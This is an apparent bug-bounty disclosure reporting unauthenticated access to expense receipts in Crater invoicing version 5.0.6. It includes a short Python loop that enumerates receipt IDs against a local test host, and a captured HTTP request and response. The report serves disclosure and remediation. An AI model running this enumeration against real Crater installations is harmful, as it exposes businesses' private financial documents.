Improper Access Control in crater-invoice/crater
Valid
Reported on
Dec 29th 2021
Description
In recent Crater version (faf1ef09 tag: 5.0.6) I discovered, that not authenticated user can download all expense receipts uploaded to any company.
Proof of Concept
import requests
for i in range(1, 100):
r = requests.get(f'http://172.17.0.1:8080/expenses/{i}/download-receipt')
if r.status_code == 200:
print(f'Downloaded receipt for expense No.{i}')
Vulnerable request:
GET /expenses/2/download-receipt HTTP/1.1
Host: 172.17.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Response:
HTTP/1.1 200 OK
Host: 172.17.0.1:8080
Date: Wed, 29 Dec 2021 19:26:07 GMT
Connection: close
X-Powered-By: PHP/8.0.14
Cache-Control: public
Date: Wed, 29 Dec 2021 19:26:07 GMT
Last-Modified: Wed, 29 Dec 2021 19:15:13 GMT
Content-Disposition: attachment; filename=Sample.pdf
Content-Type: application/pdf
Content-Length: 65695
Accept-Ranges: bytes
Set-Cookie: XSRF-TOKEN=eyJpdiI6InNZRUpvRFo0T0cxNHVmdkxvZEFDRlE9PSIsInZhbHVlIjoia1dGYld4MUdNVFVEOGNTa0NDQkZvNTdCU093WUhTbVhkWkhLMDRRYTZXUHJVYjNIZ0pxSGF2dHp4ZDFpYjZKSDAvWFVEVmJDRDBWR3hVNHJZSDdvYk1PeTZhdGlMcmxLcUNBUkhweW80V2V4VHhJWlhRVDVkWll3VDBaZ3VmbWQiLCJtYWMiOiJlNGQ4NjBmMjdlNDJkZTk2NTk0NzZjODgwZTllZDZlM2M1MmE1Zjc5NjZkYjgyZjJiNTE4ZDUyOWM5MGZlYjE5IiwidGFnIjoiIn0%3D; expires=Thu, 30-Dec-2021 19:26:07 GMT; Max-Age=86400; path=/; domain=172.17.0.1; samesite=lax
Set-Cookie: laravel_session=eyJpdiI6InV1aTZPVFlGZzNSNFFieHRnZVVzMVE9PSIsInZhbHVlIjoiNE5zMEZiNWlWVzBRRU5zdkljTi9acjFtT3lJNFpDeWJjSk9hZ1luRm9lSVgvVWc3OEJNcDhUcFJMMmNGQUVUbm9yd3FrY3dyOG5YQ0JPR1Zjamlpb1Zqd3VkUlM1YTU2bThLWEpGZDNIeHBpN3FlbDZMMEQ2M0xNZUpWd1F1QnQiLCJtYWMiOiIwN2M5NjI2YzZkY2UxNWEyOGY4M2VkM2U0ZDFkNDE3NWY4ZTVjZTY2NjhjZmMwZjM5ZmQ0NTA2MzEwNDYzNjY3IiwidGFnIjoiIn0%3D; expires=Thu, 30-Dec-2021 19:26:07 GMT; Max-Age=86400; path=/; domain=172.17.0.1; httponly; samesite=lax
Set-Cookie: 8XSG7KqTTKX6kx0xn1mEIE2dq4kSyWAoyIUaK8CF=eyJpdiI6IktHZDhvMUkzZG5nNndaNW9xM1hIZGc9PSIsInZhbHVlIjoiN1ZQaEhCekMwc1ZNTnRjbEVLamtqN0hSRHVSbFRJbnNpendEdis0RFNHM1B6NDdjZXl2WmhTMytOOUovTlNjaUo3UTZnbTlieS9GV0VaUk5CQjBmMTgrNEpwMFA1cUtybmVXQnl0QlN1bkxBZ0pSRDBad3JrSVA5VG5vV3I5WVlNWFVIWnFwTGxlYkdiZ1dyWmQ2Mmsxb0tvQW16dWE2K25hM0JvWnNSOFlyK1ZwWXNtM0o5VVVPbHdvNFlMbGFuVGJET01EY1A5TWVtbnJvaitKVHUvNEZNZ2JKbkhGVVBRakt5clBwenlsR0l1ei9zWTZLU25RenJ4aHdMaW1IWngvR091TTBZamRoQzU5OXlpZHVYMWJUNUpUV1oyaGNVclJHbElibHk1bDBFemU0QWR1RG9oNEtKTzdaVmF0ZHFsTnNsQmk5Y2J1eTR6S3VwRTJPLyt0NXFtOVE5ZlUrSWxQZWdRWWp3bGlNTzdVT2NvRHNiODcvMGlLbHJvQUwyZXpQOWJKTnpycDJoTkNCa2JNVzNNdz09IiwibWFjIjoiZDczM2UzMjdmNThiNjZlOTAyZTA5YjdiNGFjMmFjNGUxOTA4OWFmZDFiNzZhYjBjMzBlNDIxOGQxYWYxYTdmZSIsInRhZyI6IiJ9; expires=Thu, 30-Dec-2021 19:26:07 GMT; Max-Age=86400; path=/; domain=172.17.0.1; httponly; samesite=lax
%PDF-1.4
%äüöÃ
2 0 obj
<</Length 3 0 R/Filter/FlateDecode>>
stream
...
Impact
This vulnerability allows to download all receipts of expenses.
Occurrences
We are processing your report and will contact the
crater-invoice/crater
team within 24 hours.
2 years ago
A
GitHub Issue
asking the maintainers to create a
SECURITY.md exists
2 years ago
We have contacted a member of the
crater-invoice/crater
team and are waiting to hear back
2 years ago
We have sent a
follow up to the
crater-invoice/crater
team.
We will try again in 7 days.
2 years ago
We have sent a
second
follow up to the
crater-invoice/crater
team.
We will try again in 10 days.
2 years ago
web.php#L88
has been validated
to join this conversation